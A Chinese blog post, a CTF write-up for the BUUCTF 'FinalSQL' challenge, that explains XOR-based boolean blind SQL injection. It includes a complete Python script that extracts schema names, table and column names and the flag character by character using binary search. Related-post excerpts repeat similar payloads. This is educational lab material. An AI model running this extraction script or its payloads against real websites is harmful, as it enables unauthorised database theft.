buuctf web finalsql

最新推荐文章于 2025-03-20 10:18:04 发布
最新推荐文章于 2025-03-20 10:18:04 发布
阅读量469 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41696858/article/details/122249704
本文详细讲述了如何利用经典布尔盲注技术在buuctf平台上的爆破过程,通过二分查找法逐字逼近flag。作者通过python脚本展示了payload构造和自动化测试的过程,最终成功获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

没啥好说的,经典爆破,随便点一个数字,点1,会跳转到search.php?id=1
把1改成0,会报错error,经典布尔盲注,buuctf,原生爆破想都不要想,二分查找吧
先手动测试
payload?id=1^1 error
payload ?id=1^0 NO! Not this! Click others~~~
测试成功,脚本爆破

import re
import requests
import string
import time

url = "http://a3a385c8-781e-4ee7-b342-b239ceaa8a52.node4.buuoj.cn:81/search.php"
flag = ''


def payload(i, j):
    # 数据库名字
    # sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" % (i, j)
    # 表名
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)
    # 列名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)
    # 查询flag
    sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        time.sleep(1)
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

参考视频链接:https://www.bilibili.com/video/BV1GD4y1F7qv/

buuctf [极客大挑战 2019]FinalSQL
zoixsoadji的博客
03-30 895
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上大佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
Buuctf Web题解
weixin_68029979的博客
04-24 2104
写在前面, 本人小白一枚,记录一下web做题过程,大部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他大佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实大部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
buuctf-FinalSQL
m0_62094846的博客
05-11 495
说了是sql注入 看到页面首先会注入用户名和密码,但是一些字符和关键词如:' union都被过滤了 对那些数字入手看看 要第六个,可以对id入手 过滤了union ,空格,再加上id不能随意输入,随意返回,所以应该是盲注 而这里也同样过滤了很多,用布尔盲注,时间盲注都会被过滤 用异或注入试试(难度挺高的) 先尝试 ?id=1^0 ?id=1^(ascii(substr((select(group_concat(schema_name))from(information..
web buuctf [极客大挑战 2019]FinalSQL
weixin_44214568的博客
04-08 1403
知识点:盲注 1.开题 最上面提示用的语言php,脚本python,数据库mysql,注入形式sql盲注 2.随便点个12345,用bp抓包,进行fuzz 报错盲注,贴脚本 # -*- coding: utf-8 -*- # @Author: jiaoben # @Date : 2020/05/03 import re import requests import string url = "http://dcf33d60-7ffa-41c0-8915-e935ccbdd..
BUUCTF [极客大挑战 2019]FinalSQL
CyhDl666的博客
03-09 375
12345都点过了 访问id=6 提示 Clever! But not this table. 这里猜测id这里存在SQL注入,而不是以前的登录框 初步判断了一下,是一个数字型注入 且过滤了一些字符 需要fuzz一下 空格被过滤掉了用() union注入这些也被过滤的差不都了 FinalSQL可以想想到应该是盲注类型的题目 嘿嘿嘿 ^没有被过滤 可以在这里去搞点事情做做 题目有提示是盲注 所以这种题目还是跑脚本 import requests import sys import time def g.
Buuctf web Http(伪造http协议)
2401_86312572的博客
12-29 380
点开网页后他说并不来自于这个网站,这表明可能必须来自于这个网站的数据才会被接受,我们可以抓个包,伪造一下数据。我的理解是发送客户端ip为127.0.0.1后服务端识别为自身的ip,这样就可以达到在本地读取的效果。发现并没有找到,不过有新的发现,这是一个centos上的apache服务器,看有没有命令执行漏洞。返回,看一下网页源码,发现源码有一个secret.php,我们进去看看。我们添加了一个referer新字段,代表请求的网站来源。
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2637
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
BUUCTF——Web
2201_75331136的博客
07-11 1252
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
Buuctf web Php(网站备份+代码审计)
2401_86312572的博客
12-31 1219
但现在还有一个问题,就是反序列操作完成后会自动执行_wakeup这个代码,修改username值,导致在下面的if语句中被拦截,拿不到flag。因此我们需要修改序列的总属性量,改为比原有属性要大的数,这就会触发一个反序列漏洞,导致代码逻辑异常,自动略过_wakeup,有点像卡bug。private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。里面是一个虚假的flag,但是我们可以猜测,真正的网站上flag.php中有真正的flag。字符串长度也包括所加前缀的长度。
buuctf 极客大挑战 finalsql
SopRomeo的博客
02-05 1569
说来话长,这边记录下,页面不一样了,之前的注入全部行不通,考虑到最烦最难得盲注,利用二分法查找是非常快的 这边记下playload 查库名:id=1^(ascii(substr((select(database())),1,1))>1)^1 库名为geek 查表名:id=1^(ascii(substr((select(group_concat(table_name))from(inform...
Buuctf [极客大挑战 2019]FinalSQL
最新发布
m_de_g的博客
03-20 1191
【代码】Buuctf [极客大挑战 2019]FinalSQL
BUUCTF-[极客大挑战 2019]FinalSQL
weixin_44016181的博客
09-15 667
除了普通的注入流程,报错注入,时间注入外,这题涉及了布尔注入当中的异或注入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的注入方式得到flag。
【学习笔记 49】 buu [极客大挑战 2019]FinalSQL
weixin_43553654的博客
08-11 294
0x00 知识点 盲注 解体思路 盲注没有什么可以详解的知识点,只需要找到注入点,之后这里就是利用常规的payload,构造二分法脚本就可以直接解题 打开题目一看 提示说是SQL盲注,先要找到注入点,这里的注入点不是在用户名,密码处,而是在12345这个按钮的地方,点击一下跳转到search.php页面,在该页面id=后可以构造payload 这里没有什么过滤利用常规的payload就可以直接跑脚本 "id=1^(ascii(substr((select(database())),%d,1))&l
NO.2-26 [极客大挑战 2019]FinalSQL
nigo134的博客
08-03 250
根据题目提示盲注,随便点几下找到注入点 发现我们输入^符号成功跳转页面,证明存在注入 1^(ord(substr((select(group_concat(schema_name))from(information_schema.schema ta)),%d,1))=%d)^1"%(i,ord(j)) 获取数据库名称 1^(ord(substr((select(group_concat(table_name))from(information_schema.tables) where(table_s
[极客大挑战 2019]FinalSQL
追风少年亚索的博客
10-29 1068
试了很长时间发现注入点不在这里,看见了题目提示,选择正确的神秘代码即可获得flag,出现了id的注入点,重新FUZZ一下,发现单双引号是没有被过滤的,and被过滤了or没有被过滤,输入单引号出现Error,输入1^0出现NO!#payload="''or(ascii(substr(database(),%d,1))>%d)"%(i,tmp) #第一个%d对于的i,第二个%d对应的tmp,的值回到32,这意味着我们到达了字符范围的开始,这通常表示我们已经找到了完整的字符串,因此退出循环。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值